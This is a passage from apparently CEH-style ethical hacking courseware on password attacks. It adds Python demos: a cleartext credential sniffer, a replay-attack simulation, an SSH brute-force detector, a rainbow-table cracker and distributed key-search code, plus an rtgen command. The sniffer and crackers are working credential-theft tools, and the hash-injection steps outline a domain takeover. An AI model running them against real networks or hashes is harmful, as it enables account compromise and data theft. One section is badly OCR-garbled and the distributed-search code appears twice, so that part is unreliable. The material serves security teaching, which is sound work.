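        st["expect"] = None


def extract_credentials(packets):
    """Walk packets in capture order; return [(service, server_ip, user, password)]."""
    creds = []
    state = defaultdict(lambda: {"buf": b"", "user": None, "expect": None})
    for src, sport, dst, dport, payload in packets:
        key = flow_key(src, sport, dst, dport)
        client, cport, server, srv_port = key
        service = CLEARTEXT_PORTS.get(srv_port)
        if service is None:
            continue                            # not a protocol we parse
        st = state[key]
        if (src, sport) != (client, cport):
            # Server->client: Telnet prompts say what the next client line is.
            low = payload.lower()
            if low.endswith(b"login: "):
                st["expect"] = "user"
            elif low.endswith(b"password: "):
                st["expect"] = "pass"
            continue
        # Client->server: reassemble until a full line is available.
        st["buf"] += payload
        while b"\r\n" in st["buf"]:
            line, _, st["buf"] = st["buf"].partition(b"\r\n")
            handle_client_line(service, server, line, st, creds)
    return creds


if __name__ == "__main__":
    for service, server, user, password in extract_credentials(CAPTURE):
        print(f"{service:6s} {server:12s} {user} / {password}")
```

Nothing here breaks any cryptography: the three protocols simply put the password on the wire as typed, so on a shared segment the only work is stream reassembly. The defensive conclusion is the obvious one, replace these protocols with SSH, FTPS/SFTP and POP3S.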
Passive Online Attacks: Man-in-the-Middle and Replay Attack

In a MITM attack, the attacker gains access to the communication channel between the victim and the server in order to extract information. In a replay attack, packets and authentication tokens are captured with a sniffer; after the relevant information is extracted, the tokens are placed back on the network to gain access.

Considerations:
- Relatively hard to perpetrate
- Must be trusted by one or both sides
- Can sometimes be broken by invalidating traffic

A man-in-the-middle attack can take place whenever two parties are communicating. A third party intercepts the communication between them while assuring each party that it is talking to the other. Meanwhile, the third party either alters the data or simply eavesdrops and passes it along. To carry this out, the man in the middle has to sniff both sides of the connection simultaneously. This type of attack is often found against Telnet and wireless technologies. Such attacks are not easy to implement because of TCP sequence numbers and the speed required; the method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.

In a replay attack, packets are captured using a sniffer.
After the relevant information is extracted, the packets are placed back on the network. This type of attack can be used to replay bank transactions or similar data transfers in the hope of repeating or changing activities such as deposits or transfers.
FIGURE 5.4: Passive Online Attack by Using Man-in-the-Middle and Replay Attack (the attacker sniffs the original connection between the victim and the web server, then sits in the middle or replays the captured traffic)
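The replay scenario described above, and the "invalidating traffic" countermeasure the slide mentions, are spelled out in the following added example (not code from the courseware). The message format, the shared HMAC key and the bank-transfer action are constructed for the demo. A naive server that verifies only the signature accepts the sniffed request every time it is resubmitted; the hardened server additionally binds each request to a fresh nonce and a timestamp window, so a captured token is rejected once it has been used or has aged out.

```python
"""Replay attack on a captured authentication message, and a nonce/timestamp fix.

Added example, not from the CEH courseware.  The message format, the shared
key and the bank-transfer action are all constructed for the demo.  A naive
server that verifies only the signature accepts the sniffed request as many
times as it is replayed; the hardened server binds each request to a fresh
nonce and a timestamp window, so a captured token is rejected once used or
once it has aged out.
"""
import hashlib
import hmac
import json
import secrets
import time

SHARED_KEY = b"constructed-demo-key"   # assumption: pre-shared client/server secret
MAX_SKEW = 30                           # seconds a signed request stays acceptable


def sign(message: dict) -> str:
    """HMAC-SHA256 over a canonical (sorted-key) JSON encoding of the message."""
    body = json.dumps(message, sort_keys=True).encode()
    return hmac.new(SHARED_KEY, body, hashlib.sha256).hexdigest()


def make_request(action: str, amount: int, now=None, with_nonce: bool = True) -> dict:
    """Client side: build and sign a request.  with_nonce=False is the weak format."""
    msg = {"action": action, "amount": amount}
    if with_nonce:
        msg["nonce"] = secrets.token_hex(8)
        msg["ts"] = int(time.time() if now is None else now)
    return {"msg": msg, "sig": sign(msg)}


class NaiveServer:
    """Checks the signature only, so a sniffed request can be replayed at will."""

    def __init__(self):
        self.ledger = []

    def handle(self, req: dict) -> str:
        if not hmac.compare_digest(sign(req["msg"]), req["sig"]):
            return "bad signature"
        self.ledger.append(req["msg"]["amount"])
        return "ok"


class ReplaySafeServer:
    """Signature + freshness: each nonce is accepted once inside a time window."""

    def __init__(self, now_fn=time.time):
        self.ledger = []
        self.seen_nonces = {}   # nonce -> ts, pruned once older than MAX_SKEW
        self.now = now_fn

    def handle(self, req: dict) -> str:
        msg = req["msg"]
        if not hmac.compare_digest(sign(msg), req["sig"]):
            return "bad signature"            # tampered amount, forged token
        if "nonce" not in msg or "ts" not in msg:
            return "missing nonce"            # legacy format is not accepted
        now = self.now()
        self.seen_nonces = {n: t for n, t in self.seen_nonces.items()
                            if now - t <= MAX_SKEW}
        if abs(now - msg["ts"]) > MAX_SKEW:
            return "stale"                    # old capture replayed later
        if msg["nonce"] in self.seen_nonces:
            return "replay"                   # same capture replayed inside the window
        self.seen_nonces[msg["nonce"]] = msg["ts"]
        self.ledger.append(msg["amount"])
        return "ok"


def replay(server, captured: dict, times: int = 3) -> list:
    """Attacker side: put the sniffed request back on the wire 'times' times."""
    return [server.handle(captured) for _ in range(times)]


if __name__ == "__main__":
    captured = make_request("transfer", 100)      # what the sniffer saw
    naive, safe = NaiveServer(), ReplaySafeServer()
    print("naive :", replay(naive, captured), naive.ledger)   # three transfers
    print("safe  :", replay(safe, captured), safe.ledger)     # one transfer
```

The nonce cache is bounded by the timestamp window: anything older than MAX_SKEW is rejected as stale regardless of nonce, so the server only has to remember nonces seen in the last 30 seconds. Note that this protects against replay only; it does nothing against a true man in the middle who can modify the message before the client signs it.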
Active Online Attack: Password Guessing

The attacker takes a set of dictionary words and names and tries all the possible combinations against the network server to crack the password.

Considerations:
- Time consuming
- Requires huge amounts of network bandwidth
- Easily detected

Everyone knows your username, but your password is a well-kept secret that keeps others from accessing your transactions. With the aid of dictionary attack methodologies, an intruder tries many ways to guess your password. In this methodology, an attacker takes a set of dictionary words and names and tries all the possible combinations to get your password. The attacker does this with programs that guess hundreds or thousands of words per second, which makes it easy to try many variations: words spelled backwards, different capitalization, a digit added at the end, and so on. To facilitate this further, the attacker community has built large dictionaries that include words from foreign languages and the names of things, places, and towns, modeled specifically for cracking passwords. Attackers can also scan your public profiles for words that might be your password.
A good password is easy to remember but hard to guess, so protect your password by making it appear random, for example by inserting digits and punctuation. The more intricate your password, the harder it becomes for the intruder to break.
FIGURE 5.5: Active Online Attack by Using Password Guessing Method (the attacker submits guesses one by one to the network server)

Some of the considerations for password guessing are as follows:
- It takes a long time to guess the password.
- It requires huge amounts of network bandwidth.
- It can be easily detected.
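"Easily detected" is the consideration a defender should act on. The following added example (not from the courseware) shows the detection side: it parses sshd-style authentication log lines, keeps a sliding window of failures per source address, and raises an alert when a source exceeds a threshold, flagging separately when a success follows a burst of failures, which is the outcome an online guessing attack is after. The log lines are constructed for the demo, and the year used to complete the syslog timestamps (2012) is an assumption, since syslog omits it.

```python
"""Detect online password guessing from sshd authentication logs.

Added example, not from the CEH courseware.  LOG is a constructed sample in
the usual sshd syslog format; the year used to complete its timestamps is an
assumption (syslog does not record it).  A source that produces 'threshold'
failures inside 'window' seconds is reported, together with the usernames
it tried and whether a later login from it succeeded.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG = """\
Sep 26 10:00:01 gw sshd[4101]: Failed password for root from 203.0.113.9 port 40122 ssh2
Sep 26 10:00:02 gw sshd[4103]: Failed password for invalid user admin from 203.0.113.9 port 40124 ssh2
Sep 26 10:00:03 gw sshd[4105]: Failed password for invalid user oracle from 203.0.113.9 port 40126 ssh2
Sep 26 10:00:03 gw sshd[4107]: Failed password for root from 203.0.113.9 port 40128 ssh2
Sep 26 10:00:04 gw sshd[4109]: Failed password for root from 203.0.113.9 port 40130 ssh2
Sep 26 10:00:05 gw sshd[4111]: Accepted password for root from 203.0.113.9 port 40132 ssh2
Sep 26 10:00:09 gw sshd[4115]: Failed password for alice from 198.51.100.4 port 50001 ssh2
Sep 26 10:05:00 gw sshd[4200]: Accepted publickey for alice from 198.51.100.4 port 50002 ssh2
"""

TS = r"(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d)"
FAILED_RE = re.compile(
    TS + r" \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port")
ACCEPT_RE = re.compile(
    TS + r" \S+ sshd\[\d+\]: Accepted \S+ for (?P<user>\S+) from (?P<src>\S+) port")


def parse_ts(text: str, year: int = 2012) -> datetime:
    """Syslog timestamps carry no year; 2012 is an assumption for the sample."""
    return datetime.strptime(text, "%b %d %H:%M:%S").replace(year=year)


def detect_guessing(lines, window: int = 60, threshold: int = 5) -> list:
    """Sliding-window failure count per source address.

    Returns one alert dict per offending source: number of failures inside
    the window at its peak, the distinct usernames tried (many distinct
    names = spraying, one name = targeted), and whether a login from that
    source was accepted after the burst.
    """
    recent = defaultdict(deque)   # src -> deque of (timestamp, user) failures
    alerts = {}                   # src -> alert dict
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts, src = parse_ts(m["ts"]), m["src"]
            q = recent[src]
            q.append((ts, m["user"]))
            while q and (ts - q[0][0]).total_seconds() > window:
                q.popleft()       # drop failures that fell out of the window
            if len(q) >= threshold:
                a = alerts.setdefault(src, {
                    "src": src, "failures": 0, "users": set(),
                    "window_start": q[0][0].isoformat(),
                    "success_after_burst": False})
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(u for _, u in q)
            continue
        m = ACCEPT_RE.match(line)
        if m and m["src"] in alerts:
            alerts[m["src"]]["success_after_burst"] = True
    out = []
    for a in alerts.values():
        a["users"] = sorted(a["users"])
        out.append(a)
    return out


if __name__ == "__main__":
    for alert in detect_guessing(LOG.splitlines()):
        print(alert)
```

The threshold and window are the knobs that trade false positives (users mistyping) against detection latency; in production the same logic would feed an account-lockout or source-blocking action, which is exactly what makes online guessing "easily detected" compared with offline cracking.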
Active Online Attack: Trojan/Spyware/Keylogger

Spyware is a type of malware that allows attackers to secretly gather information about a person or organization. With the help of a Trojan, an attacker gains access to the passwords stored on the compromised computer and is able to read personal documents, delete files, and display pictures. A keylogger is a program that runs in the background and allows remote attackers to record every keystroke.

A Trojan is a destructive program that masquerades as a benign application. Before installation and/or execution the software appears to perform a desirable function, but in practice it steals information or harms the system. With a Trojan, attackers may have remote access to the target computer and can perform any operation permitted by the privileges of the user who installed it. Spyware is a type of malware installed on a computer to gather information about its users without their knowledge, allowing attackers to collect information about the user or the organization secretly. The presence of spyware is typically hidden from the user and can be difficult to detect.
A keylogger is a program that records all the keystrokes typed on the computer keyboard without the knowledge of the user. Once logged, the keystrokes are shipped to the attacker or hidden on the machine for later retrieval. The attacker then scrutinizes them carefully for passwords or other useful information that could be used to compromise the system. For example, a keylogger can reveal the contents of every email composed by the user of the computer on which it has been installed.
Active Online Attack: Hash Injection Attack

A hash injection attack allows an attacker to inject a compromised hash into a local session and use that hash to authenticate to network resources. The attacker finds and extracts the hash of a logged-on domain admin account, then uses the extracted hash to log on to the domain controller.

A hash injection attack is the concept of injecting a compromised hash into a local session and then using the hash to authenticate to network resources. The attack is carried out in four steps:
1. The attacker compromises one workstation or server using a local or remote exploit.
2. The attacker extracts the logged-on hashes and finds the hash of a logged-on domain admin account.
3. The attacker uses that hash to log on to the domain controller.
4. The attacker extracts all the hashes in the Active Directory database and can now impersonate any account in the domain.

FIGURE 5.6: Active Online Attack by Using Hash Injection Attack (the attacker injects a compromised hash into a local session on the victim computer)
Offline Attack: Rainbow Attacks

Convert huge word lists such as dictionary files and brute-force lists into password hashes using techniques such as rainbow tables. Compute the hash for a list of possible passwords and compare it with the precomputed hash table; if a match is found, the password is cracked. It is easy to recover passwords by comparing captured password hashes to the precomputed tables.

Offline attacks occur when the intruder checks the validity of the passwords against a copy of the stored password data. He or she observes how the passwords are stored. If the usernames and passwords are stored in a readable file, it becomes easy for him or her to gain access to the system. Hence the password list must be protected and kept in an unreadable form, that is, as hashes rather than plaintext. Offline attacks are time consuming. They succeed against LM hashes because the LM scheme has a small keyspace and a short effective length. Different password cracking techniques are available on the Internet. There are two kinds of offline attacks that an attacker can perform to discover the password:
- Rainbow attacks
- Distributed network attacks

Rainbow Attacks

A rainbow attack is an implementation of the cryptanalytic time-memory trade-off technique.
Cryptanalytic time-memory trade-off is a method that reduces the time needed for cryptanalysis by using information computed in advance and stored in memory. In the rainbow attack the same technique is used: the table of password hashes is created in advance and stored; such a table is called a "rainbow table."

Rainbow Table

A rainbow table is a lookup table used to recover a plaintext password from its hash. The attacker uses this table to look up captured password hashes and recover the corresponding passwords.

Computed Hashes

An attacker computes the hash for a list of possible passwords and compares it with the precomputed hash table (rainbow table). If a match is found, the password is cracked.

Compare the Hashes

It is easy to recover passwords by comparing captured password hashes to the precomputed tables.

Pre-Computed Hashes

Only hashed passwords should be stored in a file of username/password pairs. During the logon process the typed password is hashed with a cryptographic hash function and the result is compared with the stored value. Stored hashes alone, however, are no protection against dictionary attacks: if the file that contains the hashed passwords is readable, the attacker can easily determine which hash function was used. Precomputed tables work only because the same password always hashes to the same value; a per-user random salt mixed into the hash means a table would have to be built for every salt, which is why salted, slow hashes are the cryptographically secure representation the offline-attack countermeasures call for.
He or she can then hash each word in the dictionary with that function and compare the results with the stored hashes, thereby obtaining every password that is a word listed in the dictionary. Storing precomputed hashes for an entire keyspace takes enormous space: for example, a complete table of LM hashes would require about 310 terabytes, and NT hashes of passwords under 15 characters would require 5,652,897,009 exabytes. A time-space trade-off technique is used to reduce the memory required to store the hashes.

Example plaintext-to-hash pairs:
Iqazwed -> 4259cc34599c530b28a6a8f225d668590
hh021da -> c744b1716cbf8d4dd0ff4ce31a177151
9da8dasf -> 3cd696a8571a843cda453a229d741843
sodifo8sf -> 7ad7d6fa6bb4fd28ab98b3dd33261e8f
Tools to Create Rainbow Tables: Winrtgen and rtgen

Winrtgen is a graphical Rainbow Tables Generator that supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes.

The rtgen program needs several parameters to generate a rainbow table. The syntax of the command line is:

rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

Example from the screenshot: rtgen ntlm loweralpha 1 7 0 1000 4000000 0 (NTLM hashes, lowercase letters, plaintext length 1 to 7, table index 0, chain length 1000, 4,000,000 chains, part index 0).

http://www.oxid.it
http://project-rainbowcrack.com
Attackers can create rainbow tables by using the following tools.

Winrtgen

Source: http://www.oxid.it

Winrtgen is a graphical Rainbow Tables Generator that helps attackers create rainbow tables from which they can crack hashed passwords. It supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes.
FIGURE 5.7: Winrtgen Generate Rainbow Table in Windows (Rainbow Table properties dialog with fields for hash type, min/max length, index, chain length, chain count and number of tables; charset alpha, ABCDEFGHIJKLMNOPQRSTUVWXYZ; computed table properties: key space 8353082582 keys, disk space 810.35 MB, success probability 0.978038 (97.80%); benchmark of hash speed, step speed, table precomputation time, total precomputation time and maximum cryptanalysis time)

rtgen

Source: http://project-rainbowcrack.com

RainbowCrack is a general-purpose implementation that takes advantage of the time-memory trade-off technique to crack hashes. The project allows you to crack a hashed password; its rtgen tool is used to generate the rainbow tables.
The rtgen program needs several parameters to generate a rainbow table; you can use the following command-line syntax to generate rainbow tables:

Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table_index chain_len chain_num part_index

FIGURE 5.8: rtgen Generate Rainbow Table in Windows (command: rtgen ntlm loweralpha 1 7 0 1000 4000000 0; output file ntlm_loweralpha#1-7_0_1000x4000000_0.rt; parameters reported by the tool: hash algorithm ntlm, hash length 16, charset abcdefghijklmnopqrstuvwxyz, charset length 26, plaintext length range 1 to 7, reduce offset 0x00000000, plaintext total 8353082582, starting point 0; progress lines "rainbow chains generated" at roughly 7.6 s per block)
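The time-memory trade-off described above, and the meaning of rtgen's chain_len, chain_num and table_index parameters, are easiest to see in a miniature implementation. The following is an added example, not the courseware's or RainbowCrack's code: it builds a tiny rainbow table over a constructed keyspace (lowercase letters, fixed length 3, 17,576 plaintexts) using MD5, stores only chain endpoints, and recovers a hash by walking the chain. The reduction function and the way start points are chosen are assumptions for the demo; the success-probability figure corresponds to the one Winrtgen reports, here estimated from the plaintexts the chains actually visit.

```python
"""A miniature rainbow table: the time-memory trade-off from the text.

Added example, not the courseware's or RainbowCrack's code.  Uses MD5 over a
constructed keyspace (lowercase, fixed length 3 -> 17,576 plaintexts).  The
parameters mirror rtgen's: charset, plaintext length, chain_len, chain_num,
table_index (which only reseeds the reduction function here).
"""
import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PLAIN_LEN = 3
KEYSPACE = len(CHARSET) ** PLAIN_LEN


def hash_pw(plain: str) -> bytes:
    """The password hash being attacked (unsalted MD5 in this demo)."""
    return hashlib.md5(plain.encode()).digest()


def index_to_plain(i: int) -> str:
    """Number in [0, KEYSPACE) -> plaintext, so the keyspace can be walked."""
    chars = []
    for _ in range(PLAIN_LEN):
        chars.append(CHARSET[i % len(CHARSET)])
        i //= len(CHARSET)
    return "".join(reversed(chars))


def reduce_(digest: bytes, position: int, table_index: int = 0) -> str:
    """Map a hash back into the keyspace.

    Mixing in the column position is what makes this a *rainbow* chain:
    two chains that collide in different columns do not merge, which is
    the improvement over Hellman's single reduction function.
    """
    n = int.from_bytes(digest[:8], "little")
    return index_to_plain((n + position + table_index * 65536) % KEYSPACE)


def build_table(chain_len: int, chain_num: int, table_index: int = 0):
    """Precomputation (rtgen's job): return ({endpoint: startpoint}, coverage).

    Only the two ends of each chain are stored; the chain_len-1 plaintexts
    in between are the 'memory' traded for 'time' at lookup.  coverage is
    the fraction of the keyspace some chain passes through, i.e. the
    success probability of the table (merges and overlaps lower it).
    """
    table, visited = {}, set()
    step = max(1, KEYSPACE // chain_num)          # spread start points evenly
    for c in range(chain_num):
        start = index_to_plain((c * step) % KEYSPACE)
        p = start
        for pos in range(chain_len):
            visited.add(p)
            p = reduce_(hash_pw(p), pos, table_index)
        table.setdefault(p, start)                # first chain wins on endpoint collision
    return table, len(visited) / KEYSPACE


def lookup(table: dict, target: bytes, chain_len: int, table_index: int = 0):
    """Cracking (rcrack's job): return the plaintext for target or None.

    Assume the target sits in column k, walk to the chain end, and if that
    endpoint is in the table regenerate the chain from its start point to
    find the exact hash.  A false alarm (endpoint hit, hash absent) just
    moves on to the next column.
    """
    for k in range(chain_len - 1, -1, -1):
        p = reduce_(target, k, table_index)
        for pos in range(k + 1, chain_len):
            p = reduce_(hash_pw(p), pos, table_index)
        start = table.get(p)
        if start is None:
            continue
        q = start
        for pos in range(chain_len):
            h = hash_pw(q)
            if h == target:
                return q
            q = reduce_(h, pos, table_index)
    return None


if __name__ == "__main__":
    CHAIN_LEN, CHAIN_NUM = 50, 400
    table, coverage = build_table(CHAIN_LEN, CHAIN_NUM)
    print(f"stored {len(table)} endpoints for {CHAIN_LEN * CHAIN_NUM} chain links,"
          f" success probability ~{coverage:.1%}")
    print("crack md5('cat') ->", lookup(table, hash_pw("cat"), CHAIN_LEN))
```

With 400 chains of length 50 the table holds 400 entries instead of 17,576 hashes, at the cost of up to chain_len^2/2 hash operations per lookup and a success probability below 100%; rtgen's chain_len 1000 and chain_num 4,000,000 are the same trade made at production scale, and additional table_index values are used to push the combined success probability up.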
Distributed Network Attack

A Distributed Network Attack (DNA) is a technique for recovering password-protected files that uses the unused processing power of machines across the network to decrypt passwords. In this attack, a DNA manager is installed in a central location where machines running DNA clients can access it over the network. The DNA manager coordinates the attack, allocating small portions of the key search to the machines distributed throughout the network. The DNA client runs in the background, consuming only unused processor time. The program combines the processing capabilities of all the clients connected to the network and uses them to perform the key search needed to decrypt the files.
The DNA client runs in the background, taking only unused processor time. The program combines the processing capabilities of all the clients connected to the network and uses them to perform a key search on Office 97 and 2000 files to decrypt them.

Features of DNA:
- Reads statistics and graphs easily
- Adds user dictionaries to crack the password
- Optimizes password attacks for specific languages
- Modifies the user dictionaries
- Comprises stealth client installation functionality
- Automatically updates the client while updating the DNA server
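The manager's core job, carving one key search into independent work units that clients can grind through without talking to each other, is shown in the following added example. It is not Distributed Network Attack's own code: the "clients" are threads in a single process standing in for machines on the network, the keyspace (lowercase, length 4) and the target hash are constructed, and the unit size is an arbitrary assumption. The partitioning and the manager's bookkeeping are the same whether the workers are threads or remote hosts.

```python
"""Splitting a key search into work units, the way a DNA-style manager does.

Added example, not Distributed Network Attack's own code.  The 'clients' are
threads in one process standing in for machines on the network; the unit
partitioning and the manager's status bookkeeping are what the example is
about.  Keyspace and target are constructed (lowercase, length 4, MD5).
"""
import hashlib
from concurrent.futures import ThreadPoolExecutor, as_completed

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PLAIN_LEN = 4
KEYSPACE = len(CHARSET) ** PLAIN_LEN          # 456,976 candidates


def index_to_plain(i: int) -> str:
    """Number in [0, KEYSPACE) -> candidate password."""
    chars = []
    for _ in range(PLAIN_LEN):
        chars.append(CHARSET[i % len(CHARSET)])
        i //= len(CHARSET)
    return "".join(reversed(chars))


def target_for(plain: str) -> bytes:
    """Constructed target: the hash a real job would take from the protected file."""
    return hashlib.md5(plain.encode()).digest()


def make_work_units(unit_size: int) -> list:
    """Manager side: carve [0, KEYSPACE) into (unit_id, first, last_exclusive)."""
    return [(uid, lo, min(lo + unit_size, KEYSPACE))
            for uid, lo in enumerate(range(0, KEYSPACE, unit_size))]


def search_unit(unit: tuple, target: bytes):
    """Client side: exhaust one unit offline and report a hit or exhaustion."""
    uid, lo, hi = unit
    for i in range(lo, hi):
        cand = index_to_plain(i)
        if hashlib.md5(cand.encode()).digest() == target:
            return uid, cand
    return uid, None


def distributed_crack(target: bytes, unit_size: int = 20000, clients: int = 4):
    """Hand units to clients, collect their reports, stop when one reports a hit.

    Returns (plaintext or None, {unit_id: 'done' | 'cancelled'}).  Units that
    never started are cancelled once the password is found; units already
    running are allowed to finish, as a real manager would let a client
    complete its current unit before reassigning it.
    """
    units = make_work_units(unit_size)
    status, found = {}, None
    with ThreadPoolExecutor(max_workers=clients) as pool:
        futures = {pool.submit(search_unit, u, target): u[0] for u in units}
        for fut in as_completed(futures):
            uid, hit = fut.result()
            status[uid] = "done"
            if hit is not None:
                found = hit
                for f, other in futures.items():
                    if f.cancel():                # only not-yet-started units cancel
                        status[other] = "cancelled"
                break
    for f, uid in futures.items():                # everything else has finished by now
        status.setdefault(uid, "cancelled" if f.cancelled() else "done")
    return found, status


if __name__ == "__main__":
    password, status = distributed_crack(target_for("bear"))
    done = sum(1 for s in status.values() if s == "done")
    print(f"recovered {password!r}; {done} of {len(status)} units searched")
```

Because every unit is a contiguous index range, a client needs only its (first, last) pair and the target hash to work offline, which is the property the Network Traffic dialog's "work unit length" setting exposes: longer units mean fewer round trips to the manager but more wasted work after the password is found.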
  • 33. Ethical Hacking and Countermeasures System Hacking Q Exam 312-50 Certified Ethical Hacker C o n tr o ls t h e c lie n ts a n d id e n t if ie s w o r k d o n e b y c lie n ts D N A is d iv id e d i n t o t w o m o d u le s : DNA S erver In te rfa c e T h e D N A s e r v e r i n t e r f a c e a llo w s users t o m a n a g e D N A f r o m a s e rv e r. T h e D N A s e rv e r m o d u l e p r o v id e s t h e u s e r w i t h t h e s ta tu s o f all j o b s t h a t t h e D N A s e r v e r is e x e c u tin g . T his in t e r f a c e is d iv i d e d in t o : Q C u rre n t jo bs: T h e c u r r e n t j o b q u e u e has all t h e j o b s t h a t h a ve b e e n a d d e d t o t h e list by t h e c o n t r o l l e r . T h e c u r r e n t j o b list has m a n y c o lu m n s , such as t h e i d e n t i f i c a t i o n n u m b e r t h a t has b e e n a ssig n e d b y t h e D N A t o t h e j o b , t h e n a m e o f t h e e n c r y p t e d file , t h e p a s s w o r d t h a t has b e e n used b y t h e user, t h e p a s s w o r d t h a t m a tc h e s a ke y w h i c h can u n lo c k d a ta , t h e s ta tu s o f t h e j o b , a n d v a r io u s o t h e r c o lu m n s . © Finished jo b s: T h e f in is h e d j o b list p r o v id e s i n f o r m a t i o n a b o u t t h e j o b s t h a t can be d e c r y p t e d b y in c lu d in g t h e p a s s w o r d . T h e f in is h e d j o b s list also has m a n y c o lu m n s t h a t a re s im ila r t o t h e c u r r e n t j o b list. 
T he se c o lu m n s in c lu d e t h e i d e n t i f i c a t i o n n u m b e r a ssig n e d by D N A t o t h e j o b , t h e n a m e o f t h e e n c r y p t e d f i l e , t h e d e c r y p t e d p a t h o f t h e file , t h e ke y used t o e n c r y p t a n d d e c r y p t t h e file , t h e d a t e a n d t i m e t h a t t h e D N A s e rv e r s t a r t e d w o r k i n g o n t h e j o b , t h e d a te a n d t i m e t h e D N A s e r v e r f in is h e d w o r k i n g o n t h e j o b , t h e e la p s e d t i m e , e tc. DNA C lie n t In te rfa c e T h e D N A c l i e n t i n t e r f a c e can be used f r o m m a n y w o r k s t a t i o n s . T h e c l i e n t s ta t is t ic s can b e e a sily c o o r d i n a t e d by u sin g t h e D N A c l i e n t in t e r fa c e . T his in t e r f a c e is a v a ila b le o n m a c h in e s w h e r e t h e D N A c l i e n t a p p li c a t i o n has b e e n in s ta lle d . T h e r e a re m a n y c o m p o n e n t s such as t h e n a m e o f t h e D N A c lie n t, t h e n a m e o f t h e g r o u p t o w h i c h t h e D N A c l i e n t b e lo n g s , t h e sta tis tic s a b o u t th e c u r r e n t jo b , and m a n y o th e r c o m p o n e n ts . N etw ork M a n a g e m e n t The N e t w o r k T r a ffic a p p li c a t i o n in W i n d o w s is u sed f o r t h e purpose o f n e tw o rk m a n a g e m e n t . T he N e t w o r k T r a ffic d ia lo g b o x is u sed t o f i n d o u t t h e n e t w o r k s p e e d t h a t D N A uses a n d e a ch w o r k u n i t le n g t h o f t h e D N A c l i e n t . U sing t h e w o r k u n i t le n g t h , a D N A c l i e n t can w o r k w i t h o u t c o n t a c t i n g t h e D N A s e rv e r. T h e D N A c l i e n t a p p li c a t i o n has t h e a b i l it y t o c o n t a c t t h e D N A s e r v e r a t t h e b e g in n in g a nd e n d in g o f t h e w o r k u n i t le n g t h . T h e u s e r can m o n i t o r t h e j o b s ta tu s q u e u e a nd t h e DNA. 
W h e n t h e d a ta is c o lle c te d f r o m t h e N e t w o r k T r a ffic d ia lo g box, m o d i f i c a t i o n t o t h e c l i e n t w o r k u n i t can be m a d e . W h e n t h e size o f t h e w o r k u n i t le n g t h in c re a se s, t h e s p e e d o f t h e n e t w o r k t r a f f i c d e cre a s e s . If t h e t r a f f i c has been decreased, th e c lie n t w o r k on th e jo b s w o u ld re q u ire a lo n g e r a m o u n t o f tim e . T h e re fo re , f e w e r r e q u e s ts t o t h e s e r v e r can be m a d e d u e t o t h e r e d u c t i o n in t h e b a n d w i d t h o f n e t w o r k tra ffic . Module 05 Page 549 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
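The manager/client split described above (work units handed to clients, results reported back, longer units meaning fewer server round trips) as an added example in Python; this is not code from the DNA product or from the course material. A manager partitions an index range over a small constructed key space into work units and dispatches them to simulated clients, each of which reconstructs its candidates from the index range alone and reports a hit. The six-symbol CHARSET, the length-3 key space and the SHA-256 target are constructed stand-ins for the 40-bit RC4 key test; there is no network layer.

```python
"""Toy model of a DNA-style distributed key search.

Constructed example: a manager splits a key space into work units and
hands them to clients; each client enumerates only its own slice and
reports back.  SHA-256 over a short charset stands in for the real
40-bit RC4 key test; nothing here talks to a network.
"""
import hashlib
from concurrent.futures import ThreadPoolExecutor
from typing import Iterator, List, Optional, Tuple

CHARSET = "abc123"  # constructed 6-symbol alphabet: 6**3 == 216 candidates at length 3

WorkUnit = Tuple[int, int]  # half-open index range [start, end)


def keyspace_size(charset: str, length: int) -> int:
    """Number of candidates of the given length over the charset."""
    return len(charset) ** length


def index_to_candidate(index: int, charset: str, length: int) -> str:
    """Mixed-radix decode of a key-space index, so a client needs only the
    index range it was given (not a candidate list) to do its work."""
    base = len(charset)
    symbols = []
    for _ in range(length):
        index, digit = divmod(index, base)
        symbols.append(charset[digit])
    return "".join(reversed(symbols))


def make_work_units(total: int, unit_len: int) -> Iterator[WorkUnit]:
    """Manager side: carve the key space into units of unit_len indices.
    A longer unit means fewer manager round trips (less network traffic),
    but each client holds its unit longer before it reports."""
    for start in range(0, total, unit_len):
        yield start, min(start + unit_len, total)


def digest(candidate: str) -> str:
    """Stand-in for the per-key decryption test (here a SHA-256 hex digest)."""
    return hashlib.sha256(candidate.encode()).hexdigest()


def client_search(unit: WorkUnit, target: str, charset: str, length: int) -> Optional[str]:
    """Client side: test every candidate in the unit, return the hit or None."""
    start, end = unit
    for index in range(start, end):
        candidate = index_to_candidate(index, charset, length)
        if digest(candidate) == target:
            return candidate
    return None


def manager_run(target: str, charset: str, length: int,
                unit_len: int, clients: int) -> Tuple[Optional[str], int]:
    """Dispatch every work unit to a pool of simulated clients and collect
    the first hit.  Returns (recovered_key_or_None, units_dispatched)."""
    units: List[WorkUnit] = list(make_work_units(keyspace_size(charset, length), unit_len))
    with ThreadPoolExecutor(max_workers=clients) as pool:
        results = pool.map(lambda u: client_search(u, target, charset, length), units)
        hit = next((r for r in results if r is not None), None)
    return hit, len(units)


if __name__ == "__main__":
    secret = "c2a"  # constructed key to be found by exhaustive search
    found, dispatched = manager_run(digest(secret), CHARSET, 3, unit_len=50, clients=3)
    print(f"recovered {found!r} after dispatching {dispatched} work units")
```

Doubling unit_len halves the number of dispatches, which is the trade-off the Network Traffic dialog exposes: fewer server contacts against a longer wait for each client's report.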
• 34. Elcomsoft Distributed Password Recovery

Source: http://www.elcomsoft.com

